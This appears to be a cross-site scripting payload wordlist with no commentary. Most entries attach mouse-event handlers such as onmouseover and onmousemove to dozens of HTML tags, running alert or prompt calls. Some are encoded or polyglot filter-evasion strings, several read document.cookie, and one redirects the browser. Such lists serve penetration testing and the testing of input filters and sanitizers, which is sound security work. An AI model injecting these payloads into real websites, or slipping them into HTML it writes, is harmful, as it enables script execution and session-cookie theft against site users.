" onmouseover="confirm(165)"style="position:absolute;width:100%;height:100%;top:0;left:0;"
" onmouseover=alert(9205) bad="
" onmouseover=alert(XSS1) ">
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie1)"></IFRAME>123</h1>
"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
"onmouseover=alert(1) //
"onmouseover=alert(1)//
##%F6%3Cimg+onmouseover=prompt(/test/)//%F6%3E##1
%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
%22onmouseover%3d%22alert(document.domain)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22uo545
&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {& Opera}
&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
&#34;&#62;<h1/onmouseover='\u0061lert(1)'>
&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
' onmouseover=alert(/Black.Spook/)
' onmouseover=alert(/XSS/)
' onmouseover=alert(9205) bad='
'">><div><meter onmouseover="alert(1)"</div>"
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
1##"+onmouseover="window.location='http://localhost'##1
27##<b/alt="1"onmouseover=InputBox+1 language=vbs>test</b>##1
28##</a onmousemove="alert(1)">##1
<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
</plaintext\></|\><plaintext/onmouseover=prompt(1)
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> <script ~~~>alert(0%0)</script ~~~>
<a onmousedown="alert(1)">test</a>
<a onmouseenter="alert(1)">test</a>
<a onmouseleave="alert(1)">test</a>
<a onmousemove="alert(1)">test</a>
<a onmouseout="alert(1)">test</a>
<a onmouseover%3D"alert(1)">xss
<a onmouseover="alert(1)">test</a>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>%20<h>xxs link<a><iframe src="c" onload=alert(1)>
<a onmouseover=alert(document.cookie)>xxs link</a>
<a onmouseup="alert(1)">test</a>
<a onmousewheel=alert(1)>requires scrolling
<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
<a/onmousemove=alert(1)//>xss
<a2 onmousedown="alert(1)">test</a2>
<a2 onmouseenter="alert(1)">test</a2>
<a2 onmouseleave="alert(1)">test</a2>
<a2 onmousemove="alert(1)">test</a2>
<a2 onmouseout="alert(1)">test</a2>
<a2 onmouseover="alert(1)">test</a2>
<a2 onmouseup="alert(1)">test</a2>
<a2 onmousewheel=alert(1)>requires scrolling
<abbr onmousedown="alert(1)">test</abbr>
<abbr onmouseenter="alert(1)">test</abbr>
<abbr onmouseleave="alert(1)">test</abbr>
<abbr onmousemove="alert(1)">test</abbr>
<abbr onmouseout="alert(1)">test</abbr>
<abbr onmouseover="alert(1)">test</abbr>
<abbr onmouseup="alert(1)">test</abbr>
<abbr onmousewheel=alert(1)>requires scrolling
<acronym onmousedown="alert(1)">test</acronym>
<acronym onmouseenter="alert(1)">test</acronym>
<acronym onmouseleave="alert(1)">test</acronym>
<acronym onmousemove="alert(1)">test</acronym>
<acronym onmouseout="alert(1)">test</acronym>
<acronym onmouseover="alert(1)">test</acronym>
<acronym onmouseup="alert(1)">test</acronym>
<acronym onmousewheel=alert(1)>requires scrolling
<address onmousedown="alert(1)">test</address>
<address onmouseenter="alert(1)">test</address>
<address onmouseleave="alert(1)">test</address>
<address onmousemove="alert(1)">test</address>
<address onmouseout="alert(1)">test</address>
<address onmouseover="alert(1)">test</address>
<address onmouseup="alert(1)">test</address>
<address onmousewheel=alert(1)>requires scrolling
<animate onmousedown="alert(1)">test</animate>
<animate onmouseenter="alert(1)">test</animate>
<animate onmouseleave="alert(1)">test</animate>
<animate onmousemove="alert(1)">test</animate>
<animate onmouseout="alert(1)">test</animate>
<animate onmouseover="alert(1)">test</animate>
<animate onmouseup="alert(1)">test</animate>
<animate onmousewheel=alert(1)>requires scrolling
<animatemotion onmousedown="alert(1)">test</animatemotion>
<animatemotion onmouseenter="alert(1)">test</animatemotion>
<animatemotion onmouseleave="alert(1)">test</animatemotion>
<animatemotion onmousemove="alert(1)">test</animatemotion>
<animatemotion onmouseout="alert(1)">test</animatemotion>
<animatemotion onmouseover="alert(1)">test</animatemotion>
<animatemotion onmouseup="alert(1)">test</animatemotion>
<animatemotion onmousewheel=alert(1)>requires scrolling
<animatetransform onmousedown="alert(1)">test</animatetransform>
<animatetransform onmouseenter="alert(1)">test</animatetransform>
<animatetransform onmouseleave="alert(1)">test</animatetransform>
<animatetransform onmousemove="alert(1)">test</animatetransform>
<animatetransform onmouseout="alert(1)">test</animatetransform>
<animatetransform onmouseover="alert(1)">test</animatetransform>
<animatetransform onmouseup="alert(1)">test</animatetransform>
<animatetransform onmousewheel=alert(1)>requires scrolling
<applet onmousedown="alert(1)">test</applet>
<applet onmouseenter="alert(1)">test</applet>
<applet onmouseleave="alert(1)">test</applet>
<applet onmousemove="alert(1)">test</applet>
<applet onmouseout="alert(1)">test</applet>
<applet onmouseover="alert(1)">test</applet>
<applet onmouseup="alert(1)">test</applet>
<applet onmousewheel=alert(1)>requires scrolling
<area onmousedown="alert(1)">test</area>
<area onmouseenter="alert(1)">test</area>
<area onmouseleave="alert(1)">test</area>
<area onmousemove="alert(1)">test</area>
<area onmouseout="alert(1)">test</area>
<area onmouseover="alert(1)">test</area>
<area onmouseup="alert(1)">test</area>
<area onmousewheel=alert(1)>requires scrolling
<article onmousedown="alert(1)">test</article>
<article onmouseenter="alert(1)">test</article>
<article onmouseleave="alert(1)">test</article>
<article onmousemove="alert(1)">test</article>
<article onmouseout="alert(1)">test</article>
<article onmouseover="alert(1)">test</article>
<article onmouseup="alert(1)">test</article>
<article onmousewheel=alert(1)>requires scrolling
<aside onmousedown="alert(1)">test</aside>
<aside onmouseenter="alert(1)">test</aside>
<aside onmouseleave="alert(1)">test</aside>
<aside onmousemove="alert(1)">test</aside>
<aside onmouseout="alert(1)">test</aside>
<aside onmouseover="alert(1)">test</aside>
<aside onmouseup="alert(1)">test</aside>
<aside onmousewheel=alert(1)>requires scrolling
<audio onmousedown="alert(1)">test</audio>
<audio onmouseenter="alert(1)">test</audio>
<audio onmouseleave="alert(1)">test</audio>
<audio onmousemove="alert(1)">test</audio>
<audio onmouseout="alert(1)">test</audio>
<audio onmouseover="alert(1)">test</audio>
<audio onmouseup="alert(1)">test</audio>
<audio onmousewheel=alert(1)>requires scrolling
<audio2 onmousedown="alert(1)">test</audio2>
<audio2 onmouseenter="alert(1)">test</audio2>
<audio2 onmouseleave="alert(1)">test</audio2>
<audio2 onmousemove="alert(1)">test</audio2>
<audio2 onmouseout="alert(1)">test</audio2>
<audio2 onmouseover="alert(1)">test</audio2>
<audio2 onmouseup="alert(1)">test</audio2>
<audio2 onmousewheel=alert(1)>requires scrolling
<b onmousedown="alert(1)">test</b>
<b onmouseenter="alert(1)">test</b>
<b onmouseleave="alert(1)">test</b>
<b onmousemove="alert(1)">test</b>
<b onmouseout="alert(1)">test</b>
<b onmouseover="alert(1)">test</b>
<b onmouseup="alert(1)">test</b>
<b onmousewheel=alert(1)>requires scrolling
<base onmousedown="alert(1)">test</base>
<base onmouseenter="alert(1)">test</base>
<base onmouseleave="alert(1)">test</base>
<base onmousemove="alert(1)">test</base>
<base onmouseout="alert(1)">test</base>
<base onmouseover="alert(1)">test</base>
<base onmouseup="alert(1)">test</base>
<base onmousewheel=alert(1)>requires scrolling
<basefont onmousedown="alert(1)">test</basefont>
<basefont onmouseenter="alert(1)">test</basefont>
<basefont onmouseleave="alert(1)">test</basefont>
<basefont onmousemove="alert(1)">test</basefont>
<basefont onmouseout="alert(1)">test</basefont>
<basefont onmouseover="alert(1)">test</basefont>
<basefont onmouseup="alert(1)">test</basefont>
<basefont onmousewheel=alert(1)>requires scrolling
<bdi onmousedown="alert(1)">test</bdi>
<bdi onmouseenter="alert(1)">test</bdi>
<bdi onmouseleave="alert(1)">test</bdi>
<bdi onmousemove="alert(1)">test</bdi>
<bdi onmouseout="alert(1)">test</bdi>
<bdi onmouseover="alert(1)">test</bdi>
<bdi onmouseup="alert(1)">test</bdi>
<bdi onmousewheel=alert(1)>requires scrolling
<bdo onmousedown="alert(1)">test</bdo>
<bdo onmouseenter="alert(1)">test</bdo>
<bdo onmouseleave="alert(1)">test</bdo>
<bdo onmousemove="alert(1)">test</bdo>
<bdo onmouseout="alert(1)">test</bdo>
<bdo onmouseover="alert(1)">test</bdo>
<bdo onmouseup="alert(1)">test</bdo>
<bdo onmousewheel=alert(1)>requires scrolling
<bgsound onmousedown="alert(1)">test</bgsound>
<bgsound onmouseenter="alert(1)">test</bgsound>
<bgsound onmouseleave="alert(1)">test</bgsound>
<bgsound onmousemove="alert(1)">test</bgsound>
<bgsound onmouseout="alert(1)">test</bgsound>
<bgsound onmouseover="alert(1)">test</bgsound>
<bgsound onmouseup="alert(1)">test</bgsound>
<bgsound onmousewheel=alert(1)>requires scrolling
<big onmousedown="alert(1)">test</big>
<big onmouseenter="alert(1)">test</big>
<big onmouseleave="alert(1)">test</big>
<big onmousemove="alert(1)">test</big>
<big onmouseout="alert(1)">test</big>
<big onmouseover="alert(1)">test</big>
<big onmouseup="alert(1)">test</big>
<big onmousewheel=alert(1)>requires scrolling
<blink onmousedown="alert(1)">test</blink>
<blink onmouseenter="alert(1)">test</blink>
<blink onmouseleave="alert(1)">test</blink>
<blink onmousemove="alert(1)">test</blink>
<blink onmouseout="alert(1)">test</blink>
<blink onmouseover="alert(1)">test</blink>
<blink onmouseup="alert(1)">test</blink>
<blink onmousewheel=alert(1)>requires scrolling
<blockquote onmousedown="alert(1)">test</blockquote>
<blockquote onmouseenter="alert(1)">test</blockquote>
<blockquote onmouseleave="alert(1)">test</blockquote>
<blockquote onmousemove="alert(1)">test</blockquote>
<blockquote onmouseout="alert(1)">test</blockquote>
<blockquote onmouseover="alert(1)">test</blockquote>
<blockquote onmouseup="alert(1)">test</blockquote>
<blockquote onmousewheel=alert(1)>requires scrolling
<body onmousedown="alert(1)">test</body>
<body onmouseenter="alert(1)">test</body>
<body onmouseleave="alert(1)">test</body>
<body onmousemove="alert(1)">test</body>
<body onmouseout="alert(1)">test</body>
<body onmouseover="alert(1)">test</body>
<body onmouseup="alert(1)">test</body>
<body onmousewheel=alert(1)>requires scrolling
<br onmousedown="alert(1)">test</br>
<br onmouseenter="alert(1)">test</br>
<br onmouseleave="alert(1)">test</br>
<br onmousemove="alert(1)">test</br>
<br onmouseout="alert(1)">test</br>
<br onmouseover="alert(1)">test</br>
<br onmouseup="alert(1)">test</br>
<br onmousewheel=alert(1)>requires scrolling
<button onmousedown="alert(1)">test</button>
<button onmouseenter="alert(1)">test</button>
<button onmouseleave="alert(1)">test</button>
<button onmousemove="alert(1)">test</button>
<button onmousemove="javascript:alert(1)">xss
<button onmouseout="alert(1)">test</button>
<button onmouseover="alert(1)">test</button>
<button onmouseup="alert(1)">test</button>
<button onmousewheel=alert(1)>requires scrolling
<canvas onmousedown="alert(1)">test</canvas>
<canvas onmouseenter="alert(1)">test</canvas>
<canvas onmouseleave="alert(1)">test</canvas>
<canvas onmousemove="alert(1)">test</canvas>
<canvas onmouseout="alert(1)">test</canvas>
<canvas onmouseover="alert(1)">test</canvas>
<canvas onmouseup="alert(1)">test</canvas>
<canvas onmousewheel=alert(1)>requires scrolling
<caption onmousedown="alert(1)">test</caption>
<caption onmouseenter="alert(1)">test</caption>
<caption onmouseleave="alert(1)">test</caption>
<caption onmousemove="alert(1)">test</caption>
<caption onmouseout="alert(1)">test</caption>
<caption onmouseover="alert(1)">test</caption>
<caption onmouseup="alert(1)">test</caption>
<caption onmousewheel=alert(1)>requires scrolling
<center onmousedown="alert(1)">test</center>
<center onmouseenter="alert(1)">test</center>
<center onmouseleave="alert(1)">test</center>
<center onmousemove="alert(1)">test</center>
<center onmouseout="alert(1)">test</center>
<center onmouseover="alert(1)">test</center>
<center onmouseup="alert(1)">test</center>
<center onmousewheel=alert(1)>requires scrolling
<cite onmousedown="alert(1)">test</cite>
<cite onmouseenter="alert(1)">test</cite>
<cite onmouseleave="alert(1)">test</cite>
<cite onmousemove="alert(1)">test</cite>
<cite onmouseout="alert(1)">test</cite>
<cite onmouseover="alert(1)">test</cite>
<cite onmouseup="alert(1)">test</cite>
<cite onmousewheel=alert(1)>requires scrolling
<code onmousedown="alert(1)">test</code>
<code onmouseenter="alert(1)">test</code>
<code onmouseleave="alert(1)">test</code>
<code onmousemove="alert(1)">test</code>
<code onmouseout="alert(1)">test</code>
<code onmouseover="alert(1)">test</code>
<code onmouseup="alert(1)">test</code>
<code onmousewheel=alert(1)>requires scrolling
<col onmousedown="alert(1)">test</col>
<col onmouseenter="alert(1)">test</col>
<col onmouseleave="alert(1)">test</col>
<col onmousemove="alert(1)">test</col>
<col onmouseout="alert(1)">test</col>
<col onmouseover="alert(1)">test</col>
<col onmouseup="alert(1)">test</col>
<col onmousewheel=alert(1)>requires scrolling
<colgroup onmousedown="alert(1)">test</colgroup>
<colgroup onmouseenter="alert(1)">test</colgroup>
<colgroup onmouseleave="alert(1)">test</colgroup>
<colgroup onmousemove="alert(1)">test</colgroup>
<colgroup onmouseout="alert(1)">test</colgroup>
<colgroup onmouseover="alert(1)">test</colgroup>
<colgroup onmouseup="alert(1)">test</colgroup>
<colgroup onmousewheel=alert(1)>requires scrolling
<command onmousedown="alert(1)">test</command>
<command onmouseenter="alert(1)">test</command>
<command onmouseleave="alert(1)">test</command>
<command onmousemove="alert(1)">test</command>
<command onmouseout="alert(1)">test</command>
<command onmouseover="alert(1)">test</command>
<command onmouseup="alert(1)">test</command>
<command onmousewheel=alert(1)>requires scrolling
<content onmousedown="alert(1)">test</content>
<content onmouseenter="alert(1)">test</content>
<content onmouseleave="alert(1)">test</content>
<content onmousemove="alert(1)">test</content>
<content onmouseout="alert(1)">test</content>
<content onmouseover="alert(1)">test</content>
<content onmouseup="alert(1)">test</content>
<content onmousewheel=alert(1)>requires scrolling
<custom tags onmousedown="alert(1)">test</custom tags>
<custom tags onmouseenter="alert(1)">test</custom tags>
<custom tags onmouseleave="alert(1)">test</custom tags>
<custom tags onmousemove="alert(1)">test</custom tags>
<custom tags onmouseout="alert(1)">test</custom tags>
<custom tags onmouseover="alert(1)">test</custom tags>
<custom tags onmouseup="alert(1)">test</custom tags>
<custom tags onmousewheel=alert(1)>requires scrolling
<d3/onmouseenter=[2].find(confirm)>z
<data onmousedown="alert(1)">test</data>
<data onmouseenter="alert(1)">test</data>
<data onmouseleave="alert(1)">test</data>
<data onmousemove="alert(1)">test</data>
<data onmouseout="alert(1)">test</data>
<data onmouseover="alert(1)">test</data>
<data onmouseup="alert(1)">test</data>
<data onmousewheel=alert(1)>requires scrolling
<datalist onmousedown="alert(1)">test</datalist>
<datalist onmouseenter="alert(1)">test</datalist>
<datalist onmouseleave="alert(1)">test</datalist>
<datalist onmousemove="alert(1)">test</datalist>
<datalist onmouseout="alert(1)">test</datalist>
<datalist onmouseover="alert(1)">test</datalist>
<datalist onmouseup="alert(1)">test</datalist>
<datalist onmousewheel=alert(1)>requires scrolling
<dd onmousedown="alert(1)">test</dd>
<dd onmouseenter="alert(1)">test</dd>
<dd onmouseleave="alert(1)">test</dd>
<dd onmousemove="alert(1)">test</dd>
<dd onmouseout="alert(1)">test</dd>
<dd onmouseover="alert(1)">test</dd>
<dd onmouseup="alert(1)">test</dd>
<dd onmousewheel=alert(1)>requires scrolling
<del onmousedown="alert(1)">test</del>
<del onmouseenter="alert(1)">test</del>
<del onmouseleave="alert(1)">test</del>
<del onmousemove="alert(1)">test</del>
<del onmouseout="alert(1)">test</del>
<del onmouseover="alert(1)">test</del>
<del onmouseup="alert(1)">test</del>
<del onmousewheel=alert(1)>requires scrolling
<details onmousedown="alert(1)">test</details>
<details onmouseenter="alert(1)">test</details>
<details onmouseleave="alert(1)">test</details>
<details onmousemove="alert(1)">test</details>
<details onmouseout="alert(1)">test</details>
<details onmouseover="alert(1)">test</details>
<details onmouseup="alert(1)">test</details>
<details onmousewheel=alert(1)>requires scrolling
<dfn onmousedown="alert(1)">test</dfn>
<dfn onmouseenter="alert(1)">test</dfn>
<dfn onmouseleave="alert(1)">test</dfn>
<dfn onmousemove="alert(1)">test</dfn>
<dfn onmouseout="alert(1)">test</dfn>
<dfn onmouseover="alert(1)">test</dfn>
<dfn onmouseup="alert(1)">test</dfn>
<dfn onmousewheel=alert(1)>requires scrolling
<dialog onmousedown="alert(1)">test</dialog>
<dialog onmouseenter="alert(1)">test</dialog>
<dialog onmouseleave="alert(1)">test</dialog>
<dialog onmousemove="alert(1)">test</dialog>
<dialog onmouseout="alert(1)">test</dialog>
<dialog onmouseover="alert(1)">test</dialog>
<dialog onmouseup="alert(1)">test</dialog>
<dialog onmousewheel=alert(1)>requires scrolling
<dir onmousedown="alert(1)">test</dir>
<dir onmouseenter="alert(1)">test</dir>
<dir onmouseleave="alert(1)">test</dir>
<dir onmousemove="alert(1)">test</dir>
<dir onmouseout="alert(1)">test</dir>
<dir onmouseover="alert(1)">test</dir>
<dir onmouseup="alert(1)">test</dir>
<dir onmousewheel=alert(1)>requires scrolling
<div  style="position:absolute;top:0;left:0;width:100%;height:100%"  onmouseover="prompt(1)" onclick="alert(1)">x</button>?
<div id="54"><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>//["'`-->]]>]</div><div id="55"><video><source onerror="alert(55)">//["'`-->]]>]</div><div id="56"><video onerror="alert(56)"><source></source></video>//["'`-->]]>]</div><div id="57"><b <script>alert(57)//</script>0</script></b>//["'`-->]]>]</div><div id="58"><b><script<b></b><alert(58)</script </b></b>//["'`-->]]>]</div><div id="59"><div id="div1"><input value="``onmouseover=alert(59)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>//["'`-->]]>]</div><div id="60"><div style="[a]color[b]:[c]red">XXX</div>//["'`-->]]>]</div>
<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div  id="div2"></div><script>document.getElementById("div2").innerHTML =
<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
<div onmousedown="alert(1)">test</div>
<div onmouseenter="alert(1)">test</div>
<div onmouseleave="alert(1)">test</div>
<div onmousemove="alert(1)">test</div>
<div onmouseout="alert(1)">test</div>
<div onmouseover="alert('XSS');">,
<div onmouseover="alert(1)">test</div>
<div onmouseover="document.cookie=true;">
<div onmouseover="document.vulnerable=true;">
<div onmouseover='alert&lpar;1&rpar;'>DIV</div>
<div onmouseover=prompt("1")>xss
<div onmouseup="alert(1)">test</div>
<div onmousewheel=alert(1)>requires scrolling
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?
<div style="width:1000px;height:1000px" onmouseover=alert()></div>
<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
<div/onmouseover='alert(1)'> style="x:">
<div/onmouseover='alert(1)'>xss
<dl onmousedown="alert(1)">test</dl>
<dl onmouseenter="alert(1)">test</dl>
<dl onmouseleave="alert(1)">test</dl>
<dl onmousemove="alert(1)">test</dl>
<dl onmouseout="alert(1)">test</dl>
<dl onmouseover="alert(1)">test</dl>
<dl onmouseup="alert(1)">test</dl>
<dl onmousewheel=alert(1)>requires scrolling
<dt onmousedown="alert(1)">test</dt>
<dt onmouseenter="alert(1)">test</dt>
<dt onmouseleave="alert(1)">test</dt>
<dt onmousemove="alert(1)">test</dt>
<dt onmouseout="alert(1)">test</dt>
<dt onmouseover="alert(1)">test</dt>
<dt onmouseup="alert(1)">test</dt>
<dt onmousewheel=alert(1)>requires scrolling
<element onmousedown="alert(1)">test</element>
<element onmouseenter="alert(1)">test</element>
<element onmouseleave="alert(1)">test</element>
<element onmousemove="alert(1)">test</element>
<element onmouseout="alert(1)">test</element>
<element onmouseover="alert(1)">test</element>
<element onmouseup="alert(1)">test</element>
<element onmousewheel=alert(1)>requires scrolling
<em onmousedown="alert(1)">test</em>
<em onmouseenter="alert(1)">test</em>
<em onmouseleave="alert(1)">test</em>
<em onmousemove="alert(1)">test</em>
<em onmouseout="alert(1)">test</em>
<em onmouseover="alert(1)">test</em>
<em onmouseup="alert(1)">test</em>
<em onmousewheel=alert(1)>requires scrolling
<embed onmousedown="alert(1)">test</embed>
<embed onmouseenter="alert(1)">test</embed>
<embed onmouseleave="alert(1)">test</embed>
<embed onmousemove="alert(1)">test</embed>
<embed onmouseout="alert(1)">test</embed>
<embed onmouseover="alert(1)">test</embed>
<embed onmouseup="alert(1)">test</embed>
<embed onmousewheel=alert(1)>requires scrolling
<fieldset onmousedown="alert(1)">test</fieldset>
<fieldset onmouseenter="alert(1)">test</fieldset>
<fieldset onmouseleave="alert(1)">test</fieldset>
<fieldset onmousemove="alert(1)">test</fieldset>
<fieldset onmouseout="alert(1)">test</fieldset>
<fieldset onmouseover="alert(1)">test</fieldset>
<fieldset onmouseup="alert(1)">test</fieldset>
<fieldset onmousewheel=alert(1)>requires scrolling
<figcaption onmousedown="alert(1)">test</figcaption>
<figcaption onmouseenter="alert(1)">test</figcaption>
<figcaption onmouseleave="alert(1)">test</figcaption>
<figcaption onmousemove="alert(1)">test</figcaption>
<figcaption onmouseout="alert(1)">test</figcaption>
<figcaption onmouseover="alert(1)">test</figcaption>
<figcaption onmouseup="alert(1)">test</figcaption>
<figcaption onmousewheel=alert(1)>requires scrolling
<figure onmousedown="alert(1)">test</figure>
<figure onmouseenter="alert(1)">test</figure>
<figure onmouseleave="alert(1)">test</figure>
<figure onmousemove="alert(1)">test</figure>
<figure onmouseout="alert(1)">test</figure>
<figure onmouseover="alert(1)">test</figure>
<figure onmouseup="alert(1)">test</figure>
<figure onmousewheel=alert(1)>requires scrolling
<font onmousedown="alert(1)">test</font>
<font onmouseenter="alert(1)">test</font>
<font onmouseleave="alert(1)">test</font>
<font onmousemove="alert(1)">test</font>
<font onmouseout="alert(1)">test</font>
<font onmouseover="alert(1)">test</font>
<font onmouseup="alert(1)">test</font>
<font onmousewheel=alert(1)>requires scrolling
<footer onmousedown="alert(1)">test</footer>
<footer onmouseenter="alert(1)">test</footer>
<footer onmouseleave="alert(1)">test</footer>
<footer onmousemove="alert(1)">test</footer>
<footer onmouseout="alert(1)">test</footer>
<footer onmouseover="alert(1)">test</footer>
<footer onmouseup="alert(1)">test</footer>
<footer onmousewheel=alert(1)>requires scrolling
<form onmousedown="alert(1)">test</form>
<form onmouseenter="alert(1)">test</form>
<form onmouseleave="alert(1)">test</form>
<form onmousemove="alert(1)">test</form>
<form onmouseout="alert(1)">test</form>
<form onmouseover="alert(1)">test</form>
<form onmouseup="alert(1)">test</form>
<form onmousewheel=alert(1)>requires scrolling
<frame onmousedown="alert(1)">test</frame>
<frame onmouseenter="alert(1)">test</frame>
<frame onmouseleave="alert(1)">test</frame>
<frame onmousemove="alert(1)">test</frame>
<frame onmouseout="alert(1)">test</frame>
<frame onmouseover="alert(1)">test</frame>
<frame onmouseup="alert(1)">test</frame>
<frame onmousewheel=alert(1)>requires scrolling
<frameset onmousedown="alert(1)">test</frameset>
<frameset onmouseenter="alert(1)">test</frameset>
<frameset onmouseleave="alert(1)">test</frameset>
<frameset onmousemove="alert(1)">test</frameset>
<frameset onmouseout="alert(1)">test</frameset>
<frameset onmouseover="alert(1)">test</frameset>
<frameset onmouseup="alert(1)">test</frameset>
<frameset onmousewheel=alert(1)>requires scrolling
<h1 onmousedown="alert(1)">test</h1>
<h1 onmouseenter="alert(1)">test</h1>
<h1 onmouseleave="alert(1)">test</h1>
<h1 onmousemove="alert(1)">test</h1>
<h1 onmouseout="alert(1)">test</h1>
<h1 onmouseover="alert(1)">test</h1>
<h1 onmouseup="alert(1)">test</h1>
<h1 onmousewheel=alert(1)>requires scrolling
<h1/onmouseover='alert(1)'>xss
<head onmousedown="alert(1)">test</head>
<head onmouseenter="alert(1)">test</head>
<head onmouseleave="alert(1)">test</head>
<head onmousemove="alert(1)">test</head>
<head onmouseout="alert(1)">test</head>
<head onmouseover="alert(1)">test</head>
<head onmouseup="alert(1)">test</head>
<head onmousewheel=alert(1)>requires scrolling
<header onmousedown="alert(1)">test</header>
<header onmouseenter="alert(1)">test</header>
<header onmouseleave="alert(1)">test</header>
<header onmousemove="alert(1)">test</header>
<header onmouseout="alert(1)">test</header>
<header onmouseover="alert(1)">test</header>
<header onmouseup="alert(1)">test</header>
<header onmousewheel=alert(1)>requires scrolling
<hgroup onmousedown="alert(1)">test</hgroup>
<hgroup onmouseenter="alert(1)">test</hgroup>
<hgroup onmouseleave="alert(1)">test</hgroup>
<hgroup onmousemove="alert(1)">test</hgroup>
<hgroup onmouseout="alert(1)">test</hgroup>
<hgroup onmouseover="alert(1)">test</hgroup>
<hgroup onmouseup="alert(1)">test</hgroup>
<hgroup onmousewheel=alert(1)>requires scrolling
<hr onmousedown="alert(1)">test</hr>
<hr onmouseenter="alert(1)">test</hr>
<hr onmouseleave="alert(1)">test</hr>
<hr onmousemove="alert(1)">test</hr>
<hr onmouseout="alert(1)">test</hr>
<hr onmouseover="alert(1)">test</hr>
<hr onmouseup="alert(1)">test</hr>
<hr onmousewheel=alert(1)>requires scrolling
<html onmousedown="alert(1)">test</html>
<html onmouseenter="alert(1)">test</html>
<html onmouseleave="alert(1)">test</html>
<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>
<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> <body onblur body onblur="javascript:javascript:alert(1)"></body onblur> \x3Cscript>javascript:alert(1)</script>
<html onmousemove="alert(1)">test</html>
<html onmouseout="alert(1)">test</html>
<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>
<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> <object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body  onbeforeunload>
<html onmouseover="alert(1)">test</html>
<Html Onmouseover=(alert)(1) //
<html onmouseup="alert(1)">test</html>
<html onmousewheel=alert(1)>requires scrolling
<i onmousedown="alert(1)">test</i>
<i onmouseenter="alert(1)">test</i>
<i onmouseleave="alert(1)">test</i>
<i onmousemove="alert(1)">test</i>
<i onmouseout="alert(1)">test</i>
<i onmouseover="alert(1)">test</i>
<i onmouseup="alert(1)">test</i>
<i onmousewheel=alert(1)>requires scrolling
<iframe onmousedown="alert(1)">test</iframe>
<iframe onmouseenter="alert(1)">test</iframe>
<iframe onmouseleave="alert(1)">test</iframe>
<iframe onmousemove="alert(1)">test</iframe>
<iframe onmouseout="alert(1)">test</iframe>
<iframe onmouseover="alert(1)">test</iframe>
<iframe onmouseup="alert(1)">test</iframe>
<iframe onmousewheel=alert(1)>requires scrolling
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<iframe2 onmousedown="alert(1)">test</iframe2>
<iframe2 onmouseenter="alert(1)">test</iframe2>
<iframe2 onmouseleave="alert(1)">test</iframe2>
<iframe2 onmousemove="alert(1)">test</iframe2>
<iframe2 onmouseout="alert(1)">test</iframe2>
<iframe2 onmouseover="alert(1)">test</iframe2>
<iframe2 onmouseup="alert(1)">test</iframe2>
<iframe2 onmousewheel=alert(1)>requires scrolling
<image onmousedown="alert(1)">test</image>
